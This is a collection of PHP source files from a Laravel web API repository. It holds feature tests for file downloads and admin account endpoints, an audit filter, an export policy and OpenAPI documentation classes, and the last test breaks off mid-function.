"alpha_fraction": 0.5757749080657959,
"alphanum_fraction": 0.5790601372718811,
"avg_line_length": 31.71495246887207,
"blob_id": "2d5ad9dd4b961c866baaf4fee3ec13d65e556aa3",
"content_id": "94978f431e7583481474105636f716742a2b77eb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 7001,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 214,
"path": "/tests/Feature/V1/File/DownloadControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1\\File;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse App\\Models\\File;\nuse App\\Services\\FileService;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass DownloadControllerTest extends TestCase\n{\n /*\n * Invoke.\n */\n\n /** @test */\n public function guest_cannot_download_private(): void\n {\n $file = factory(File::class)->states('private')->create();\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\");\n\n $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n $response->assertJsonValidationErrors('token');\n }\n\n /** @test */\n public function guest_can_download_public(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->states('public')->create();\n $file->upload('Test content');\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\");\n\n $response->assertStatus(Response::HTTP_OK);\n $response->assertHeader('Content-Type', File::MIME_TYPE_TXT . '; charset=UTF-8');\n $this->assertEquals('Test content', $response->getContent());\n }\n\n /** @test */\n public function end_user_cannot_download_private(): void\n {\n $file = factory(File::class)->states('private')->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\");\n\n $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n $response->assertJsonValidationErrors('token');\n }\n\n /** @test */\n public function end_user_can_download_public(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->states('public')->create();\n $file->upload('Test content');\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\");\n\n $response->assertStatus(Response::HTTP_OK);\n $response->assertHeader('Content-Type', File::MIME_TYPE_TXT . '; charset=UTF-8');\n $this->assertEquals('Test content', $response->getContent());\n }\n\n /** @test */\n public function admin_can_download_public(): void\n {\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->states('public')->create();\n $file->upload('Test content');\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\");\n\n $response->assertStatus(Response::HTTP_OK);\n $response->assertHeader('Content-Type', File::MIME_TYPE_TXT . '; charset=UTF-8');\n $this->assertEquals('Test content', $response->getContent());\n }\n\n /** @test */\n public function admin_can_download_private_with_valid_token(): void\n {\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->states('private')->create();\n $file->upload('Test content');\n\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = (new FileService())->request($file, $admin);\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\", ['token' => $fileToken->id]);\n\n $response->assertStatus(Response::HTTP_OK);\n $response->assertHeader('Content-Type', File::MIME_TYPE_TXT . '; charset=UTF-8');\n $this->assertEquals('Test content', $response->getContent());\n }\n\n /** @test */\n public function admin_cannot_download_private_with_valid_token_for_another_admin(): void\n {\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->states('private')->create();\n $file->upload('Test content');\n\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = (new FileService())->request($file, factory(Admin::class)->create());\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\", ['token' => $fileToken->id]);\n\n $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n $response->assertJsonValidationErrors('token');\n }\n\n /** @test */\n public function admin_cannot_download_private_with_expired_token(): void\n {\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->states('private')->create();\n $file->upload('Test content');\n\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = (new FileService())->request($file, $admin);\n\n Passport::actingAs($admin->user);\n\n Date::setTestNow(\n Date::now()->addSeconds(\n (int)config('connecting_voices.file_tokens.expiry_time') + 1\n )\n );\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\", ['token' => $fileToken->id]);\n\n $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n $response->assertJsonValidationErrors('token');\n }\n\n /** @test */\n public function admin_cannot_download_private_without_token(): void\n {\n $file = factory(File::class)->states('private')->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/files/{$file->id}/download\");\n\n $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n $response->assertJsonValidationErrors('token');\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_download(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\File $file */\n $file = factory(File::class)->states('public')->create();\n $file->upload('Test content');\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson(\"/v1/files/{$file->id}/download\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $file): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === \"Downloaded file [{$file->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6136701107025146,
"alphanum_fraction": 0.6151559948921204,
"avg_line_length": 23.925926208496094,
"blob_id": "506e57f64879abf55a786d4bd22e8d826dbfc3bd",
"content_id": "96f5c7e368dd354d3bed5df26b11777df8ab866b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 673,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 27,
"path": "/app/Http/Filters/Audit/AdminIdFilter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Filters\\Audit;\n\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Spatie\\QueryBuilder\\Filters\\Filter;\n\nclass AdminIdFilter implements Filter\n{\n /**\n * @param \\Illuminate\\Database\\Eloquent\\Builder $query\n * @param string $adminId\n * @param string $property\n * @return \\Illuminate\\Database\\Eloquent\\Builder\n */\n public function __invoke(Builder $query, $adminId, string $property): Builder\n {\n return $query->whereHas(\n 'user.admin',\n function (Builder $query) use ($adminId): void {\n $query->where('id', '=', $adminId);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6411378383636475,
"alphanum_fraction": 0.6433260440826416,
"avg_line_length": 17.280000686645508,
"blob_id": "1ea90b13b3dca5054b95368b0b8a926da0d6fa5f",
"content_id": "67a684e9561cc9baa409caf88e63dc0745f4df44",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 457,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 25,
"path": "/app/Policies/ExportPolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass ExportPolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can request the export.\n *\n * @param \\App\\Models\\User $user\n * @param string $export\n * @return bool\n */\n public function request(User $user, string $export): bool\n {\n return $user->isAdmin();\n }\n}\n"
},
{
"alpha_fraction": 0.6471494436264038,
"alphanum_fraction": 0.6479198932647705,
"avg_line_length": 30.658536911010742,
"blob_id": "473d0120463c5f50a40ba392a9ad341a58f0402a",
"content_id": "3e925eec60222d6360d128225d98040794c27069",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1298,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 41,
"path": "/app/Docs/Operations/Admins/ShowAdminOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Admins;\n\nuse App\\Docs\\Schemas\\Admin\\AdminSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\AdminsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass ShowAdminOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('Get a specific admin')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(AdminsTag::create())\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, AdminSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5556875467300415,
"alphanum_fraction": 0.5559845566749573,
"avg_line_length": 38.61176300048828,
"blob_id": "bba968b1e20cbf1c775472e844a971b48dd9d37f",
"content_id": "5bcdb2c0bb13911707f290c2acbfe087040463c4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3367,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 85,
"path": "/app/Docs/Operations/Contributions/IndexContributionOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Contributions;\n\nuse App\\Docs\\Parameters\\FilterParameter;\nuse App\\Docs\\Parameters\\PageParameter;\nuse App\\Docs\\Parameters\\PerPageParameter;\nuse App\\Docs\\Parameters\\SortParameter;\nuse App\\Docs\\Schemas\\Contribution\\ContributionSchema;\nuse App\\Docs\\Schemas\\PaginationSchema;\nuse App\\Docs\\Tags\\ContributionsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass IndexContributionOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('List all contributions')\n ->description(\n Utils::operationDescription(\n ['Public', Admin::class, EndUser::class],\n <<<'EOT'\n * If accessed by the public, then only public contributions will be accessible.\n * If access by an end user, then only public contributions and all of their own \n will be accessible.\n EOT\n )\n )\n ->tags(ContributionsTag::create())\n ->noSecurity()\n ->parameters(\n PageParameter::create(),\n PerPageParameter::create(),\n FilterParameter::create(null, 'id')\n ->description('The IDs of the contributions to filter by')\n ->schema(Schema::string())\n ->style(FilterParameter::STYLE_SIMPLE),\n FilterParameter::create(null, 'end_user_id')\n ->description(\n <<<'EOT'\n The ID of an end user to filter by\n\n * Can only be used by an end user when specifying their own ID.\n * Can be used by an admin.\n EOT\n )\n ->schema(Schema::string()->format(Schema::FORMAT_UUID)),\n FilterParameter::create(null, 'tag_ids')\n ->description(\n <<<'EOT'\n A comma separated list of tag IDs to filter by\n \n * Use `untagged` to search for contributions that have no tag (ignores soft \n deleted tags).\n EOT\n )\n ->schema(Schema::string()),\n SortParameter::create(null, ['created_at'], '-created_at')\n )\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n PaginationSchema::create(null, ContributionSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.4742636978626251,
"alphanum_fraction": 0.48958620429039,
"avg_line_length": 26.98202896118164,
"blob_id": "568a2d331a4ab9f34db97abc1a1bd2eddb23b70b",
"content_id": "8ba4d28710adbcabe5f08e5d56fee207474ddf5b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 21798,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 779,
"path": "/tests/Feature/V1/AdminControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse App\\Models\\Notification;\nuse App\\Models\\User;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass AdminControllerTest extends TestCase\n{\n /*\n * Index.\n */\n\n /** @test */\n public function guest_cannot_index(): void\n {\n $response = $this->getJson('/v1/admins');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_index(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/admins');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/admins');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/admins');\n\n $response->assertCollectionDataStructure([\n 'id',\n 'name',\n 'phone',\n 'email',\n 'created_at',\n 'updated_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_index(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson('/v1/admins');\n\n $response->assertJsonFragment([\n [\n 'id' => $admin->id,\n 'name' => $admin->name,\n 'phone' => $admin->phone,\n 'email' => $admin->user->email,\n 'created_at' => $admin->user->created_at->toIso8601String(),\n 'updated_at' => $admin->user->updated_at->toIso8601String(),\n ],\n ]);\n }\n\n /** @test */\n public function can_filter_by_ids_for_index(): void\n {\n $admin1 = factory(Admin::class)->create();\n $admin2 = factory(Admin::class)->create();\n $admin3 = factory(Admin::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/admins', [\n 'filter[id]' => \"{$admin1->id},{$admin2->id}\",\n ]);\n\n $response->assertJsonFragment(['id' => $admin1->id]);\n $response->assertJsonFragment(['id' => $admin2->id]);\n $response->assertJsonMissing(['id' => $admin3->id]);\n }\n\n /** @test */\n public function can_filter_by_name_for_index(): void\n {\n $admin1 = factory(Admin::class)->create([\n 'name' => 'John',\n ]);\n $admin2 = factory(Admin::class)->create([\n 'name' => 'Doe',\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'name' => 'Test',\n ])->user\n );\n\n $response = $this->getJson('/v1/admins', ['filter[name]' => 'John']);\n\n $response->assertJsonFragment(['id' => $admin1->id]);\n $response->assertJsonMissing(['id' => $admin2->id]);\n }\n\n /** @test */\n public function can_filter_by_email_for_index(): void\n {\n $admin1 = factory(Admin::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ]);\n $admin2 = factory(Admin::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ])->user\n );\n\n $response = $this->getJson('/v1/admins', ['filter[email]' => '[email protected]']);\n\n $response->assertJsonFragment(['id' => $admin1->id]);\n $response->assertJsonMissing(['id' => $admin2->id]);\n }\n\n /** @test */\n public function can_filter_by_phone_for_index(): void\n {\n $admin1 = factory(Admin::class)->create([\n 'phone' => '07000000000',\n ]);\n $admin2 = factory(Admin::class)->create([\n 'phone' => '07999999999',\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'phone' => '00000000000',\n ])->user\n );\n\n $response = $this->getJson('/v1/admins', ['filter[phone]' => '07000000000']);\n\n $response->assertJsonFragment(['id' => $admin1->id]);\n $response->assertJsonMissing(['id' => $admin2->id]);\n }\n\n /** @test */\n public function can_sort_by_name_for_index(): void\n {\n $admin1 = factory(Admin::class)->create([\n 'name' => 'Borris',\n ]);\n $admin2 = factory(Admin::class)->create([\n 'name' => 'Andrew',\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'name' => 'Carl',\n ])->user\n );\n\n $response = $this->getJson('/v1/admins', ['sort' => 'name']);\n\n $response->assertNthIdInCollection(1, $admin1->id);\n $response->assertNthIdInCollection(0, $admin2->id);\n }\n\n /** @test */\n public function can_sort_by_email_for_index(): void\n {\n $admin1 = factory(Admin::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ]);\n $admin2 = factory(Admin::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ])->user\n );\n\n $response = $this->getJson('/v1/admins', ['sort' => 'email']);\n\n $response->assertNthIdInCollection(1, $admin1->id);\n $response->assertNthIdInCollection(0, $admin2->id);\n }\n\n /** @test */\n public function can_sort_by_phone_for_index(): void\n {\n $admin1 = factory(Admin::class)->create([\n 'phone' => '07111111111',\n ]);\n $admin2 = factory(Admin::class)->create([\n 'phone' => '07000000000',\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'phone' => '07222222222',\n ])->user\n );\n\n $response = $this->getJson('/v1/admins', ['sort' => 'phone']);\n\n $response->assertNthIdInCollection(1, $admin1->id);\n $response->assertNthIdInCollection(0, $admin2->id);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_index(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson('/v1/admins');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === 'Viewed all admins.'\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Store.\n */\n\n /** @test */\n public function guest_cannot_store(): void\n {\n $response = $this->postJson('/v1/admins');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_store(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->postJson('/v1/admins');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_store(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/admins', [\n 'name' => 'John',\n 'phone' => '07000000000',\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n ]);\n\n $response->assertStatus(Response::HTTP_CREATED);\n }\n\n /** @test */\n public function structure_correct_for_store(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/admins', [\n 'name' => 'John',\n 'phone' => '07000000000',\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n ]);\n\n $response->assertResourceDataStructure([\n 'id',\n 'name',\n 'phone',\n 'email',\n 'created_at',\n 'updated_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_store(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/admins', [\n 'name' => 'John',\n 'phone' => '07000000000',\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n ]);\n\n $response->assertJsonFragment([\n 'name' => 'John',\n 'phone' => '07000000000',\n 'email' => '[email protected]',\n ]);\n }\n\n /** @test */\n public function uk_mobile_required_for_store(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/admins', [\n 'name' => 'John',\n 'phone' => '+1-541-754-3010',\n 'email' => '[email protected]',\n 'password' => 'secret',\n ]);\n\n $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n $response->assertJsonValidationErrors('phone');\n }\n\n /** @test */\n public function secure_password_required_for_store(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/admins', [\n 'name' => 'John',\n 'phone' => '07000000000',\n 'email' => '[email protected]',\n 'password' => 'secret',\n ]);\n\n $response->assertStatus(Response::HTTP_UNPROCESSABLE_ENTITY);\n $response->assertJsonValidationErrors('password');\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_store(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $response = $this->postJson('/v1/admins', [\n 'name' => 'John',\n 'phone' => '07000000000',\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n ]);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = Admin::findOrFail($response->getId());\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $admin): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_CREATE\n && $event->getDescription() === \"Created admin [{$admin->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Show.\n */\n\n /** @test */\n public function guest_cannot_show(): void\n {\n $admin = factory(Admin::class)->create();\n\n $response = $this->getJson(\"/v1/admins/{$admin->id}\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_show(): void\n {\n $admin = factory(Admin::class)->create();\n\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->getJson(\"/v1/admins/{$admin->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_show(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson(\"/v1/admins/{$admin->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_show(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson(\"/v1/admins/{$admin->id}\");\n\n $response->assertResourceDataStructure([\n 'id',\n 'name',\n 'phone',\n 'email',\n 'created_at',\n 'updated_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_show(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson(\"/v1/admins/{$admin->id}\");\n\n $response->assertJsonFragment([\n 'id' => $admin->id,\n 'name' => $admin->name,\n 'phone' => $admin->phone,\n 'email' => $admin->user->email,\n 'created_at' => $admin->user->created_at->toIso8601String(),\n 'updated_at' => $admin->user->updated_at->toIso8601String(),\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_show(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $this->getJson(\"/v1/admins/{$admin->id}\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($admin): bool {\n return $event->getUser()->is($admin->user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === \"Viewed admin [{$admin->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Update.\n */\n\n /** @test */\n public function guest_cannot_update(): void\n {\n $admin = factory(Admin::class)->create();\n\n $response = $this->putJson(\"/v1/admins/{$admin->id}\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_update(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/admins/{$admin->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_update(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/admins/{$admin->id}\", [\n 'name' => 'John',\n 'phone' => '07000000000',\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n ]);\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_update(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/admins/{$admin->id}\", [\n 'name' => 'John',\n 'phone' => '07000000000',\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n ]);\n\n $response->assertResourceDataStructure([\n 'id',\n 'name',\n 'phone',\n 'email',\n 'created_at',\n 'updated_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_update(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/admins/{$admin->id}\", [\n 'name' => 'John',\n 'phone' => '07000000000',\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n ]);\n\n $response->assertJsonFragment([\n 'id' => $admin->id,\n 'name' => 'John',\n 'phone' => '07000000000',\n 'email' => '[email protected]',\n ]);\n }\n\n /** @test */\n public function only_password_can_be_provided_for_update(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/admins/{$admin->id}\", [\n 'password' => 'P@55w0rD!',\n ]);\n\n $response->assertJsonFragment([\n 'id' => $admin->id,\n 'name' => $admin->name,\n 'phone' => $admin->phone,\n 'email' => $admin->user->email,\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_update(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $this->putJson(\"/v1/admins/{$admin->id}\", [\n 'name' => 'John',\n 'phone' => '07000000000',\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n ]);\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($admin): bool {\n return $event->getUser()->is($admin->user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_UPDATE\n && $event->getDescription() === \"Updated admin [{$admin->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Destroy.\n */\n\n /** @test */\n public function guest_cannot_destroy(): void\n {\n $admin = factory(Admin::class)->create();\n\n $response = $this->deleteJson(\"/v1/admins/{$admin->id}\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_destroy(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->deleteJson(\"/v1/admins/{$admin->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_destroy(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->deleteJson(\"/v1/admins/{$admin->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function database_records_and_relationships_deleted_for_destroy(): void\n {\n $admin = factory(Admin::class)->create();\n $audit = factory(Audit::class)->create(['user_id' => $admin->user->id]);\n $notification = factory(Notification::class)->create(['user_id' => $admin->user->id]);\n $fileToken = $this->createPngFile()->fileTokens()->create(['user_id' => $admin->user->id]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n 